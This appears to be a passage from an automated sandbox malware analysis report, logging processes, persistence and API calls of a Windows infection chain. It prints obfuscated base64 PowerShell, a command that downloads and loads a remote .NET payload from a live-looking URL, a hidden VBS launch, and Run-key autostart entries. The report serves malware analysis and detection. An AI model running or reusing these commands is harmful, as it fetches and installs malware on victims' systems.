ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,27_2_0041CB50
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B8A2055 pushad ; iretd 3_2_00007FFD9B8A232D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9B884204 pushad ; ret 21_2_00007FFD9B88422D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9B88399F push FFFFFFCBh; retf 21_2_00007FFD9B883AD2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9B8B6329 push ecx; ret 23_2_00007FFD9B8B632C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9B8B354D push ebx; iretd 23_2_00007FFD9B8B361A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9B8B6678 push ebx; iretd 23_2_00007FFD9B8B66AA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9B8B66AB push ebx; iretd 23_2_00007FFD9B8B66AA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00457106 push ecx; ret 27_2_00457119
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0045B11A push esp; ret 27_2_0045B141
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00457A28 push eax; ret 27_2_00457A46
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00434E56 push ecx; ret 27_2_00434E69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00406EB0 ShellExecuteW,URLDownloadToFileW,27_2_00406EB0

                        Boot Survival

                        barindex
                        Creates autostart registry keys with suspicious names
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run _______________________-------------Jump to behavior
                        Creates autostart registry keys with suspicious values (likely registry only malware)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run _______________________------------- Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,27_2_0041AA4A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run _______________________-------------Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run _______________________-------------Jump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,27_2_0041CB50
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
